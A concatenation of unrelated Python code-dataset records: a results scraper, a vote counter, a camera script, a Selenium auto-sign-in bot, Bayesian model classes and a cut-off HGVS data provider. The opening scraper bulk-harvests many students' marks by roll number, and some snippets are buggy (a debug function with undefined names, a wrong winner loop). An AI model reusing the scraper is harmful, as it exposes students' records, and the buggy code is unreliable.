'/wEPDwULLTExNDk4NTI2NzcPZBYCAgMPZBYUAg0PD2QWAh4Hb25jbGljawURcmV0dXJuIHZhbGlkYXRlKClkAg8PDxYCHgdWaXNpYmxlaGRkAhMPDxYCHwFoZGQCFQ88KwAKAGQCFw88KwARAwAPZBYCHgtib3JkZXJjb2xvcgUHI0Y0RjRGNAEQFgAWABYADBQrAABkAhkPDxYCHwFoZGQCGw8PFgIfAWhkZAIdDw8WAh8BaGRkAh8PDxYCHwFoZGQCIQ8PFgIfAWhkZBgCBQlHcmlkVmlldzEPZ2QFCUZvcm1WaWV3MQ9nZLaGGV84hEKN39bx3qJj+4a+uqf4R6P0rR8C8lOVSVpq',\n '__VIEWSTATEGENERATOR': 'A980467A',\n '__EVENTTARGET': '',\n '__EVENTARGUMENT': '',\n '__EVENTVALIDATION': '/wEdAAMM1iTKfqRaR+qYZptN5JwpESCFkFW/RuhzY1oLb/NUVM34O/GfAV4V4n0wgFZHr3fON8hWKDQq3TURb4VWk91Q+JSmQ8P4fnfGKZMawLVg9Q==',\n 'TextBox1': roll_no,\n 'Button1': 'Get Marks'\n }\n\n response = requests.post(\n arrear_url, data=data)\n re_status = re.findall(\n r'RA|A|F|P', response.text)\n\n re_sub = re.findall(r'\\w{5}', response.text)\n re_sub = re_sub[2:]\n re_sub = re.findall(r'\\w{5}', ''.join(re_sub))\n\n string = \"\"\n for i in range(len(re_status)):\n if \"A\" in re_status[i]:\n string += re_sub[i] + \",\"\n\n if string == \"\":\n print(\"{} ===> None\".format(roll_no))\n else:\n print(\"{} ===> {}\".format(roll_no, string))\n\n\ndef calc_result(roll):\n s = requests.Session()\n\n roll_no = roll\n data = {\n '__LASTFOCUS': '',\n '__VIEWSTATE': '/wEPDwULLTExNDk4NTI2NzcPZBYCAgMPZBYUAg0PD2QWAh4Hb25jbGljawURcmV0dXJuIHZhbGlkYXRlKClkAg8PDxYCHgdWaXNpYmxlaGRkAhMPDxYCHwFoZGQCFQ88KwAKAGQCFw88KwARAwAPZBYCHgtib3JkZXJjb2xvcgUHI0Y0RjRGNAEQFgAWABYADBQrAABkAhkPDxYCHwFoZGQCGw8PFgIfAWhkZAIdDw8WAh8BaGRkAh8PDxYCHwFoZGQCIQ8PFgIfAWhkZBgCBQlHcmlkVmlldzEPZ2QFCUZvcm1WaWV3MQ9nZLaGGV84hEKN39bx3qJj+4a+uqf4R6P0rR8C8lOVSVpq',\n '__VIEWSTATEGENERATOR': 'A980467A',\n '__EVENTTARGET': '',\n '__EVENTARGUMENT': '',\n '__EVENTVALIDATION': '/wEdAAMM1iTKfqRaR+qYZptN5JwpESCFkFW/RuhzY1oLb/NUVM34O/GfAV4V4n0wgFZHr3fON8hWKDQq3TURb4VWk91Q+JSmQ8P4fnfGKZMawLVg9Q==',\n 'TextBox1': roll_no,\n 'Button1': 'Get Marks'\n }\n\n response = s.post(result_url, data=data)\n\n re_marks = re.findall(r'\\d{3}|AAA', response.text)\n\n re_sub = re.findall(r'\\w{5}', response.text)\n\n parse_marks = []\n for m in range(2, len(re_marks), 3):\n if \"AAA\" in re_marks[m]:\n parse_marks.append(0)\n else:\n parse_marks.append(\n int(\"\".join(re.findall(r'\\d\\d\\d', re_marks[m])).lstrip('0')))\n\n parse_code = [\n \"\".join(\n re.findall(\n r'\\w{5}',\n re_sub[s])) for s in range(\n 2,\n len(re_sub))]\n\n result = {parse_code[i]: parse_marks[i] for i in range(len(parse_code))}\n\n total = 0\n\n for sub_code in subjects:\n if sub_code in result:\n 
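# marks parsed as 0 ('AAA' = absent) add nothing; subject codes missing\n            # from the result dict are skipped entirely\n            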
total += result[sub_code]\n    results[roll_no] = total\n\n\ndef calc_reval(roll):\n    s = requests.Session()\n\n    roll_no = roll\n\n    data = {\n        '__LASTFOCUS': '',\n        '__VIEWSTATE': '/wEPDwUJODEwOTUzODMyD2QWAgIDD2QWDgINDw9kFgIeB29uY2xpY2sFEXJldHVybiB2YWxpZGF0ZSgpZAIPDw8WAh4HVmlzaWJsZWhkZAIRDw8WAh8BaGRkAhMPDxYCHwFoZGQCFQ88KwAKAGQCFw88KwARAwAPZBYCHgtib3JkZXJjb2xvcgUHI0Y0RjRGNAEQFgAWABYADBQrAABkAhkPDxYCHwFoZGQYAgUJR3JpZFZpZXcxD2dkBQlGb3JtVmlldzEPZ2Tfdvhl7BTyehkS/2IirXre+dWXHUGudvANtU82yKxvDA==',\n        '__VIEWSTATEGENERATOR': 'B2629E41',\n        '__EVENTTARGET': '',\n        '__EVENTARGUMENT': '',\n        '__EVENTVALIDATION': '/wEdAAM4BwhzC3yKHH4siEx+iEyuESCFkFW/RuhzY1oLb/NUVM34O/GfAV4V4n0wgFZHr3fxiLwv6L5Ozd5PGfKmBeoNzVXf1WPreDieg8Rngi/JHQ==',\n        'TextBox1': roll_no,\n        'Button1': 'Get Marks'\n    }\n\n    response = s.post(reval_url, data=data)\n\n    re_marks = re.findall(r'>\d\d\d\w{5} {}\".format(roll_no, result))\n\n\ndef Main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\n        \"-r\", \"--result\", help=\"Get the result\", action=\"store_true\")\n    parser.add_argument(\n        \"-a\", \"--arrear\", help=\"Get the arrear result\", action=\"store_true\")\n    parser.add_argument(\n        \"-re\", \"--reval\", help=\"Get the reval result\", action=\"store_true\")\n    parser.add_argument(\n        \"-o\", \"--out\", help=\"store the output to a file\", action=\"store_true\")\n\n    args = parser.parse_args()\n\n    if args.reval:\n        if status(reval_url):\n\n            print(\"========== Revaluation ==========\")\n            with concurrent.futures.ThreadPoolExecutor() as executor:\n                executor.map(calc_reval, roll_number)\n\n            print(\"========== End ==========\")\n\n        else:\n            print(\"Invalid url \")\n\n    if args.arrear:\n        if status(arrear_url):\n\n            print(\"========== Arrears ==========\")\n\n            with concurrent.futures.ProcessPoolExecutor() as executor:\n                executor.map(calc_arrears, roll_number)\n\n            print(\"========== End ==========\")\n\n        else:\n            print(\"Invalid url \")\n\n    if args.result:\n        if status(result_url):\n            print(\"========== Results ==========\")\n\n            with concurrent.futures.ThreadPoolExecutor() as executor:\n                executor.map(calc_result, roll_number)\n\n            for key, value in sorted(results.items()):\n\n                print(\"{} ===> {} ===> {}\".format(key, value, value / 6))\n\n            print(\"========== End ==========\")\n        else:\n            print(\"Invalid url \")\n\n\nif __name__ == \"__main__\":\n\tif len(sys.argv) < 2:\n\t\tprint(f\"Run python3 {sys.argv[0]} --help\")\n\telse:\n\t\tresults = {}\n\t\tMain()\n# Todo output func ","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"99295161","text":"f=open('domainMesh_20000_Converted_Mask.msh','r')\n\nlines=[]\nfor i in f:\n    lines.append(i)\nf.close()\n\nline=0\nwhile lines[line]!='\"Condutivity\"\\n':\n    line+=1\nline+=7\n\nresultsFile=open('NN_prediction.txt','r')\nfor i in range(line,len(lines)-1):\n    lines[i] = lines[i].split('\\t')[0]+'\\t'+resultsFile.readline()\nresultsFile.close()\n\nf=open('domainMesh_20000_Converted_Mask.msh','w')\nfor l in lines:\n    f.write(l)\nf.close()\n\nprint(\"-\")\n","sub_path":"substituteMshMask.py","file_name":"substituteMshMask.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"525150818","text":" #PyPoll Analysis\n#-------------------------------\n\n#Step 1: Import the modules I'll need\nimport os\nimport csv\n\n#Step 2: Identify the election_data.csv file we'll use for PyPoll\npollcsv = 
os.path.join(\"Resources\",\"election_data.csv\")\n\ntotalvotes = 0\ncandidates = {}\npercentages = {}\nvotes= {}\ntotalcandidatevotes = 0\n\nwith open(pollcsv, newline=\"\") as csvfile:\n electionreader = csv.reader(csvfile, delimiter=\",\")\n election_reader = next(electionreader)\n \n for row in electionreader:\n #Step 3: Collect number of total votes\n totalvotes = totalvotes + 1\n\n #Step 4: Identify where candidate data is located\n candidate = row[2]\n\n #Step 5: Identify how many votes each candidate received\n if candidate not in candidates.keys():\n candidates[candidate] = [row[0]]\n \n else:\n candidates[candidate].append(row[0])\n\n #Step 6: Identify what percentage of votes the candidates received\n for candidatename in candidates.keys():\n votes[candidatename] = len(candidates[candidatename])\n percentages[candidatename] = len(candidates[candidatename])/totalvotes * 100\n\n#Step 7: Print election results\nprint(f'Election Results')\nprint(\"-------------------\")\nprint(f'Total Votes: {totalvotes}')\nprint(\"-------------------\")\nfor candidatename in candidates.keys():\n print(f'{candidatename} {len(candidates[candidatename])} ({round(percentages[candidatename],3)}%)')\n\nfor candidatename in candidates.keys(): \n if len(candidates[candidate]) > totalcandidatevotes:\n totalcandidatevotes = len(candidates[candidate])\n winner = candidatename\nprint(\"-------------------\")\nprint(f'Winner: {winner}')\nprint(\"-------------------\")\n\n#Step 8: Your final script should both print the analysis to the terminal and export a text file with the results.\noutputpath = os.path.join(\"output\",\"PyPollAnalysis.txt\")\noutputfile = open(outputpath, \"w\")\n\n#Writing out the text\noutputfile.writelines(f'Election Results')\noutputfile.writelines(\"\\n-------------------\")\noutputfile.writelines(f'\\nTotal Votes: {totalvotes}')\noutputfile.writelines(\"\\n-------------------\")\nfor candidatename in candidates.keys():\n outputfile.writelines(f'\\n{candidatename} {len(candidates[candidatename])} ({round(percentages[candidatename],3)}%)')\noutputfile.writelines(\"\\n-------------------\")\noutputfile.writelines(f'\\nWinner: {winner}')\noutputfile.writelines(\"\\n-------------------\")","sub_path":"PyPoll/test data/main_CM_test_12-13-19.py","file_name":"main_CM_test_12-13-19.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"155717832","text":"import time\nimport picamera\n\nwith picamera.PiCamera() as camera:\n\tfor x in range (0,3):\n\t\tcamera.resolution = (1024, 768)\n\t\tcamera.start_preview()\n\t\ttime.sleep(.5)\n\t\tcamera.capture('test' + str(x) + '.jpg')\n\tcamera.stop_preview()\n\tcamera.close()\n","sub_path":"dsurve.py","file_name":"dsurve.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"565560200","text":"#Nombre: Alejandro Cadena\r\n#Correo: Dobleaduo@gmail.com\r\n#Mostrar si se aprueba la materia o no\r\nnombre=input(\"Ingrese nombre del estudiante: \")\r\nclases=int(input(\"Ingrese el total de numnero de clases del semestre: \"))\r\nausencias=int(input(\"Ingrese el numero de fallas a clase: \"))\r\nnotadefinitiva=float(input(\"Ingrese la nota definitiva del curso: \"))\r\nperdidaporfallas=clases*0.2\r\nif ausencias>perdidaporfallas:\r\n print(\"Ud perdio por fallas y su nota es de 0\")\r\nelse:\r\n print(\"felicidades aprobo el curso: 
\",notadefinitiva)","sub_path":"algoritmo15.py","file_name":"algoritmo15.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"219985186","text":"import time, os\nfrom selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nimport configparser\n#http://my.4399.com/forums/mtag-78097\n#http://my.4399.com/jifen/\n\ndef main(is_head):\n #设置请求头\n headers=(\"User-Agent\",\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0\")\n \n config = configparser.ConfigParser() # 类实例化\n path_default_sys = r'.\\path\\path_sys.ini'\n path_default_chrome = r'.\\Google\\Chrome\\Application\\chromedriver.exe'\n config.read(path_default_sys)\n path = config['path']['path_ini']\n config.read(path)\n \n #打开一个Chrome浏览器\n if is_head:\n #浏览器显示\n driver = webdriver.Chrome(config['path']['path_chrome']) #还可以指定路径\n else:\n #无头模式\n chrome_path = config['path']['path_chrome']\n option=webdriver.ChromeOptions()\n option.add_argument('headless') # 设置option\n driver = webdriver.Chrome(executable_path=chrome_path, chrome_options=option)\n \n # 请求网站\n url1 = 'http://my.4399.com/forums/mtag-78097'\n url2 = 'http://my.4399.com/jifen/'\n driver.get(url1)\n driver.switch_to_frame('popup_login_frame')#先跳转到iframe框架\n\n all_infor = []\n is_success = False\n is_success1 = False\n is_success2 = False\n try:\n #登录\n try:\n driver.find_element_by_xpath(\"//div[@class = 'sign_group']/a\").click()#签到\n except:\n #未登录时\n WebDriverWait(driver, 2, 0.1).until(lambda x: x.find_element_by_name('username')).send_keys(config['path_4399']['username'])\n #username = driver.find_element_by_name('username').send_keys(config['path_4399']['username'])\n driver.find_element_by_id('j-password').send_keys(config['path_4399']['password'])\n \n #登录\n driver.find_element_by_xpath(\"//div[@class = 'login_hor ux_login clearfix']/input\").click()\n try:\n #密码错误\n infor = WebDriverWait(driver, 1, 0.1).until(lambda x: x.find_element_by_xpath(\"//div[@id = 'Msg']\")).text\n pwd = False\n except:\n pwd = True\n pass\n if not pwd:\n raise\n driver.switch_to.default_content()\n\n #url1签到\n try:\n try:\n infor = driver.find_element_by_xpath(\"//div[@class = 'sign_group sign_disabled']/a\").text\n infor = \"您已签到!\"\n except:\n element = WebDriverWait(driver, 2, 0.1).until(lambda x: x.find_element_by_xpath(\"//div[@class = 'sign_group']/a\"))\n driver.execute_script(\"arguments[0].click();\", element)\n infor = WebDriverWait(driver, 1, 0.1).until(lambda x: x.find_element_by_xpath(\"//div[@class = 'sign_group sign_disabled']/a\")).text\n infor += \"!\"\n is_success1 = True\n all_infor += [url1, infor]\n except:\n #若url1签到失败不影响url2签到\n infor = \"签到失败!\"\n\n all_infor += [url1, infor]\n \n #url2签到\n driver.get(url2)\n try:\n infor = WebDriverWait(driver, 2, 0.1).until(lambda x: x.find_element_by_xpath(\"//div[@class = 'jf_checkin_box']/a/span\"))\n if infor.text == \"我要签到\":\n infor.click()\n time.sleep(1.5)\n infor = \"成功签到!\"\n is_success2 = True\n elif infor.text == \"查看签到记录\":\n infor = \"您已签到!\"\n is_success2 = True\n else:\n infor = \"签到失败!\"\n\n all_infor += [url2, infor]\n except:\n infor = \"签到失败!\"\n all_infor += [url2, infor]\n \n except:\n if not pwd: all_infor += [url1, infor]\n else: all_infor += [\"程序出错\"]\n \n if is_success1 and is_success2: is_success = True\n driver.close()\n try: os.system('taskkill /im chromedriver.exe /F')\n except: pass\n all_infor += 
['\\n']\n return all_infor, is_success\n\nif __name__ == \"__main__\":\n print(main(1))","sub_path":"V4.3/sgsqd.py","file_name":"sgsqd.py","file_ext":"py","file_size_in_byte":4247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"636785425","text":"def debug():\n print(f'path_to_folder_expts = {path_to_folder_expts}')\n print(f'net_filename = {net_filename}')\n print(f'seed = {seed}')\n print(f'matlab_filename = {matlab_filename}')\n ''' '''\n use_cuda = torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n ''' '''\n data_set = 'mnist'\n data_eval_type = 'evalaute_mdl_on_full_data_set'\n evalaute_mdl_data_set = get_function_evaluation_from_name(data_eval_type)\n ''' data '''\n data_path = './data'\n print(f'data_set = {data_set}')\n trainset, testset, classes = data_class.get_data_processors(data_path, 0.0, dataset_type=data_set, standardize=True)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=1024, shuffle=True, num_workers=10)\n testloader = torch.utils.data.DataLoader(testset, batch_size=1024, shuffle=False, num_workers=10)\n trainloader = self.trainloader\n testloader = self.testloader\n ''' Criterion '''\n error_criterion = metrics.error_criterion\n criterion = torch.nn.CrossEntropyLoss()\n iterations = math.inf\n ''' Nets'''\n net_path = os.path.join(path_to_folder_expts, net_filename)\n net = utils.restore_entire_mdl(net_path).cuda()\n # net2 = utils.restore_entire_mdl(path).cuda()\n # net3 = utils.restore_entire_mdl(path).cuda()\n ''' stats about the nets '''\n train_loss_epoch, train_error_epoch = evalaute_mdl_data_set(criterion, error_criterion, net, trainloader, device)\n test_loss_epoch, test_error_epoch = evalaute_mdl_data_set(criterion, error_criterion, net, testloader, device)\n nb_params = nn_mdls.count_nb_params(net)\n ''' print net stats '''\n print(\n f'train_loss_norm, train_error_norm, test_loss_norm, test_error_norm = {train_loss_norm, train_error_norm, test_loss_norm, test_error_norm}')\n print(\n f'train_loss_un, train_error_un, test_loss_un, test_error_un = {train_loss_un, train_error_un, test_loss_un, test_error_un}')\n print(f'train_loss_epoch, train_error_epoch = {train_loss_epoch}, {train_error_epoch}')\n print(f'test_loss_epoch, test_error_epoch = {test_loss_epoch}, {test_error_epoch}')\n print(f'nb_params {nb_params}')","sub_path":"pytorch_experiments/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"530978868","text":"\"\"\"\r\nWeek 7 - Activity: Aggregation\r\n---------\r\nAUTHOR: Edward Camp\r\n\"\"\"\r\n\r\nfrom Week7.Dog import Dog\r\nfrom Week7.Cat import Cat\r\nfrom Week7.Collar import Collar\r\n\r\n'''\r\nFor our classes so far, their variables consist of either strings or numbers. However, it is possible for classes to\r\nhave instances of classes as variables as well. If we pass in an object into the constructor of another class for it to\r\nbe stored, it is called aggregation. Suppose that an instance of 'Dog' is given a 'Collar' object. Then the relationship\r\nbetween the two objects would be that \"the Dog HAS A Collar.\"\r\n\r\nIn this activity, we will be implementing a class called Collar that will store an owner's name, a phone-number, and an \r\naddress. It should also have a 'getInfo' method that should be called within the Dog or Cat's 'getInfo' methods if\r\nthere is a collar present. 
This will require you to revise your Dog and Cat classes. I'd suggest using optional\r\nparameter values.\r\n'''\r\n\r\ncollar1 = Collar(\"Alex\", \"635-474-3383\", \"2054 Panama Lane\")\r\ncollar2 = Collar(\"Bethany\", \"293-555-0875\", \"695 Lazuli Road\")\r\n\r\n\r\ndog1 = Dog(\"gold\", 7, ['sit', 'lay', 'rollover'], \"golden retriever\", \"ball\", collar1)\r\ndog2 = Dog(\"black\", 4, ['shake', 'speak'], \"toy poodle\", \"sock\", collar2)\r\n\r\ncat1 = Cat(\"gray\", 9, 8, \"russian blue\", \"chicken\", collar1)\r\ncat2 = Cat(\"brown\", 6, 12, \"maine coon\", \"fish\")\r\n\r\ndog1.getInfo()\r\ncat1.getInfo()\r\ndog2.getInfo()\r\ncat2.getInfo()\r\n","sub_path":"Week7/activity3.py","file_name":"activity3.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"80610211","text":"from abc import ABC, abstractmethod\nfrom math import ceil\nfrom typing import Sequence\nimport warnings\n\nimport arviz as az\nimport biom\nfrom cmdstanpy import CmdStanModel\nimport pandas as pd\nfrom patsy import dmatrix\n\nfrom .model_util import full_fit_to_inference, single_feature_fit_to_inference\n\n\nclass BaseModel(ABC):\n \"\"\"Base BIRDMAn model.\n\n :param table: Feature table (features x samples)\n :type table: biom.table.Table\n\n :param model_path: Filepath to Stan model\n :type model_path: str\n\n :param num_iter: Number of posterior sample draws, defaults to 500\n :type num_iter: int\n\n :param num_warmup: Number of posterior draws used for warmup, defaults to\n num_iter\n :type num_warmup: int\n\n :param chains: Number of chains to use in MCMC, defaults to 4\n :type chains: int\n\n :param seed: Random seed to use for sampling, defaults to 42\n :type seed: float\n \"\"\"\n def __init__(\n self,\n table: biom.table.Table,\n model_path: str,\n num_iter: int = 500,\n num_warmup: int = None,\n chains: int = 4,\n seed: float = 42,\n ):\n self.num_iter = num_iter\n if num_warmup is None:\n self.num_warmup = num_iter\n else:\n self.num_warmup = num_warmup\n self.chains = chains\n self.seed = seed\n self.sample_names = table.ids(axis=\"sample\")\n self.model_path = model_path\n self.sm = None\n self.fit = None\n\n self.dat = {\n \"D\": table.shape[0], # number of features\n \"N\": table.shape[1], # number of samples\n }\n\n self.specified = False\n\n def create_regression(self, formula: str, metadata: pd.DataFrame):\n \"\"\"Generate design matrix for count regression modeling.\n\n :param formula: Design formula to use in model\n :type formula: str\n\n :param metadata: Metadata for design matrix\n :type metadata: pd.DataFrame\n \"\"\"\n self.dmat = dmatrix(formula, metadata.loc[self.sample_names],\n return_type=\"dataframe\")\n self.colnames = self.dmat.columns\n\n param_dict = {\n \"p\": self.dmat.shape[1],\n \"x\": self.dmat.values,\n }\n self.add_parameters(param_dict)\n\n def compile_model(self):\n \"\"\"Compile Stan model.\"\"\"\n self.sm = CmdStanModel(stan_file=self.model_path)\n\n def specify_model(\n self,\n params: Sequence[str],\n coords: dict,\n dims: dict,\n include_observed_data: bool = False,\n posterior_predictive: str = None,\n log_likelihood: str = None,\n **kwargs,\n ):\n \"\"\"Specify coordinates and dimensions of model.\n\n :param params: Posterior fitted parameters to include\n :type params: Sequence[str]\n\n :param coords: Mapping of entries in dims to labels\n :type coords: dict\n\n :param dims: Dimensions of parameters in the model\n :type dims: dict\n\n :param include_observed_data: Whether 
to include the original feature\n table values into the ``arviz`` InferenceData object, default is\n False\n :type include_observed_data: bool\n\n :param posterior_predictive: Name of posterior predictive values from\n Stan model to include in ``arviz`` InferenceData object\n :type posterior_predictive: str, optional\n\n :param log_likelihood: Name of log likelihood values from Stan model\n to include in ``arviz`` InferenceData object\n :type log_likelihood: str, optional\n\n :param kwargs: Extra keyword arguments to save in specifications dict\n \"\"\"\n self.params = params\n self.coords = coords\n self.dims = dims\n self.include_observed_data = include_observed_data\n self.posterior_predictive = posterior_predictive\n self.log_likelihood = log_likelihood\n self.specifications = kwargs\n\n self.specified = True\n\n def add_parameters(self, param_dict: dict = None):\n \"\"\"Add parameters from dict to be passed to Stan.\"\"\"\n if param_dict is None:\n param_dict = dict()\n self.dat.update(param_dict)\n\n def fit_model(\n self,\n sampler_args: dict = None,\n convert_to_inference: bool = False\n ):\n \"\"\"Fit Stan model.\n\n :param sampler_args: Additional parameters to pass to CmdStanPy\n sampler (optional)\n :type sampler_args: dict\n\n :param convert_to_inference: Whether to automatically convert to\n inference given model specifications, defaults to False\n :type convert_to_inference: bool\n \"\"\"\n if sampler_args is None:\n sampler_args = dict()\n\n _fit = self.sm.sample(\n chains=self.chains,\n parallel_chains=self.chains,\n data=self.dat,\n iter_warmup=self.num_warmup,\n iter_sampling=self.num_iter,\n seed=self.seed,\n **sampler_args\n )\n\n self.fit = _fit\n\n # If auto-conversion fails, fit will be of type CmdStanMCMC\n if convert_to_inference:\n try:\n self.fit = self.to_inference()\n except Exception as e:\n warnings.warn(\n \"Auto conversion to InferenceData has failed! fit has \"\n \"been saved as CmdStanMCMC instead. 
See error message\"\n f\": \\n{type(e).__name__}: {e}\",\n category=UserWarning\n )\n\n @abstractmethod\n def to_inference(self):\n \"\"\"Convert fitted model to az.InferenceData.\"\"\"\n\n\nclass TableModel(BaseModel):\n \"\"\"Fit a model on the entire table at once.\"\"\"\n def __init__(self, table: biom.Table, **kwargs):\n super().__init__(table=table, **kwargs)\n self.feature_names = table.ids(axis=\"observation\")\n self.add_parameters(\n {\"y\": table.matrix_data.todense().T.astype(int)}\n )\n\n def to_inference(self) -> az.InferenceData:\n \"\"\"Convert fitted Stan model into ``arviz`` InferenceData object.\n\n :returns: ``arviz`` InferenceData object with selected values\n :rtype: az.InferenceData\n \"\"\"\n if self.fit is None:\n raise ValueError(\"Model has not been fit!\")\n\n # if already Inference, just return\n if isinstance(self.fit, az.InferenceData):\n return self.fit\n\n if not self.specified:\n raise ValueError(\"Model has not been specified!\")\n\n inference = full_fit_to_inference(\n fit=self.fit,\n params=self.params,\n coords=self.coords,\n dims=self.dims,\n posterior_predictive=self.posterior_predictive,\n log_likelihood=self.log_likelihood,\n **self.specifications\n )\n\n if self.include_observed_data:\n obs = az.from_dict(\n observed_data={\"observed\": self.dat[\"y\"]},\n coords={\n \"tbl_sample\": self.sample_names,\n \"feature\": self.feature_names\n },\n dims={\n \"observed\": [\"tbl_sample\", \"feature\"]\n }\n )\n inference = az.concat(inference, obs)\n return inference\n\n\nclass SingleFeatureModel(BaseModel):\n \"\"\"Fit a model for a single feature.\"\"\"\n def __init__(self, table: biom.Table, feature_id: str, **kwargs):\n super().__init__(table=table, **kwargs)\n self.feature_id = feature_id\n values = table.data(\n id=feature_id,\n axis=\"observation\",\n dense=True\n ).astype(int)\n self.add_parameters({\"y\": values})\n\n def to_inference(self) -> az.InferenceData:\n \"\"\"Convert fitted Stan model into ``arviz`` InferenceData object.\n\n :returns: ``arviz`` InferenceData object with selected values\n :rtype: az.InferenceData\n \"\"\"\n if self.fit is None:\n raise ValueError(\"Model has not been fit!\")\n\n # if already Inference, just return\n if isinstance(self.fit, az.InferenceData):\n return self.fit\n\n if not self.specified:\n raise ValueError(\"Model has not been specified!\")\n\n inference = single_feature_fit_to_inference(\n fit=self.fit,\n params=self.params,\n coords=self.coords,\n dims=self.dims,\n posterior_predictive=self.posterior_predictive,\n log_likelihood=self.log_likelihood,\n **self.specifications\n )\n\n if self.include_observed_data:\n obs = az.from_dict(\n observed_data={\"observed\": self.dat[\"y\"]},\n coords={\"tbl_sample\": self.sample_names},\n dims={\"observed\": [\"tbl_sample\"]}\n )\n inference = az.concat(inference, obs)\n return inference\n\n\nclass ModelIterator:\n \"\"\"Iterate through features in a table.\n\n This class is intended for those looking to parallelize model fitting\n across individual features rather than across Markov chains.\n\n :param table: Feature table (features x samples)\n :type table: biom.table.Table\n\n :param model: BIRDMAn model for each individual feature\n :type model: birdman.model_base.SingleFeatureModel\n\n :param num_chunks: Number of chunks to split table features. 
By default\n        does not do any chunking.\n    :type num_chunks: int\n\n    :param kwargs: Keyword arguments to pass to each feature model\n    \"\"\"\n    def __init__(\n        self,\n        table: biom.Table,\n        model: SingleFeatureModel,\n        num_chunks: int = None,\n        **kwargs\n    ):\n        self.feature_names = list(table.ids(axis=\"observation\"))\n        self.size = table.shape[0]\n        self.model_type = model\n        self.num_chunks = num_chunks\n        models = [model(table, fid, **kwargs) for fid in self.feature_names]\n\n        if num_chunks is None:\n            self.chunks = list(zip(self.feature_names, models))\n        else:\n            chunk_size = ceil(self.size / num_chunks)\n            self.chunks = []\n            for i in range(0, self.size, chunk_size):\n                chunk_feature_names = self.feature_names[i: i+chunk_size]\n                chunk_models = models[i: i+chunk_size]\n\n                chunk = [\n                    (fid, _model) for fid, _model\n                    in zip(chunk_feature_names, chunk_models)\n                ]\n                self.chunks.append(chunk)\n\n    def __iter__(self):\n        return (chunk for chunk in self.chunks)\n\n    def __getitem__(self, chunk_idx: int):\n        return self.chunks[chunk_idx]\n\n    def __len__(self):\n        return len(self.chunks)\n","sub_path":"birdman/model_base.py","file_name":"model_base.py","file_ext":"py","file_size_in_byte":10719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"22183744","text":"'''\nInput: a List of integers where every int except one shows up twice\nReturns: an integer\n'''\n\n\ndef single_number(arr):\n    '''\n    my_list = []\n    for i in arr:\n        if i in my_list:\n            my_list.remove(i)\n        else:\n            my_list.append(i)\n    return my_list.pop()\n    '''\n\n    '''\n    XOR \"exclusive or\" operator ^\n    O(1)\n\n    a | b | a ^ b\n    --|---|------\n    0 | 0 | 0\n    0 | 1 | 1\n    1 | 0 | 1\n    1 | 1 | 0\n\n    Example: 7 ^ 10\n    In binary: 0111 ^ 1010\n      0111\n    ^ 1010\n    ======\n      1101 = 13\n\n    Example 2:\n    10 ^ 5\n    >> 15\n    15 ^ 5\n    >> 10\n\n    '''\n\n    a = 0\n    for i in arr:\n        a ^= i\n    return a\n\n\nif __name__ == '__main__':\n    # Use the main function to test your implementation\n    arr = [1, 4, 1, 4, 5, 3, 3, 7, 9, 5, 7]\n\n    print(f\"The odd-number-out is {single_number(arr)}\")\n","sub_path":"single_number/single_number.py","file_name":"single_number.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"221990816","text":"# -*- coding: utf-8 -*-\n\"\"\"implements a vvhgvs data provider interface using UTA\n(https://github.com/biocommons/uta)\n\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport contextlib\nimport inspect\nimport logging\nimport os\nimport re\n\nimport psycopg2\nimport psycopg2.extras\nimport psycopg2.pool\n\nfrom bioutils.assemblies import make_ac_name_map\nfrom bioutils.digests import seq_md5\nfrom six.moves.urllib import parse as urlparse\n\nimport vvhgvs\nfrom ..dataproviders.interface import Interface\nfrom ..exceptions import HGVSError, HGVSDataNotAvailableError\nfrom .seqfetcher import SeqFetcher\nimport six\n\n_logger = logging.getLogger(__name__)\n\n\ndef _stage_from_version(version):\n    \"\"\"return \"prd\", \"stg\", or \"dev\" for the given version string. 
A value is always returned\"\"\"\n if version:\n m = re.match(r\"^(?P\\d+\\.\\d+\\.\\d+)(?P.*)\", version)\n if m:\n return \"stg\" if m.group(\"extra\") else \"prd\"\n return \"dev\"\n\n\ndef _get_uta_db_url():\n \"\"\"returns UTA DB URL based on environment variables and code version\n\n * if UTA_DB_URL is set, use that\n * Otherwise, if _UTA_URL_KEY is set, use that as the name of a\n config file entry and use the corresponding URL\n * Otherwise, \n\n \"\"\"\n\n if \"UTA_DB_URL\" in os.environ:\n return os.environ[\"UTA_DB_URL\"]\n\n if \"_UTA_URL_KEY\" in os.environ:\n url_key = os.environ[\"_UTA_URL_KEY\"]\n else:\n quit(\"\"\"\n V.V. usage can be quite heavy, variant validators \"test_configuration.py\" asserts that we \n should at least explicitly chose the location, therefore, for vvhgvs, disable silent public \n fallback, explicitly set a external url key if remote data is needed.\n \"\"\")\n sdlc = _stage_from_version(vvhgvs.__version__)\n url_key = 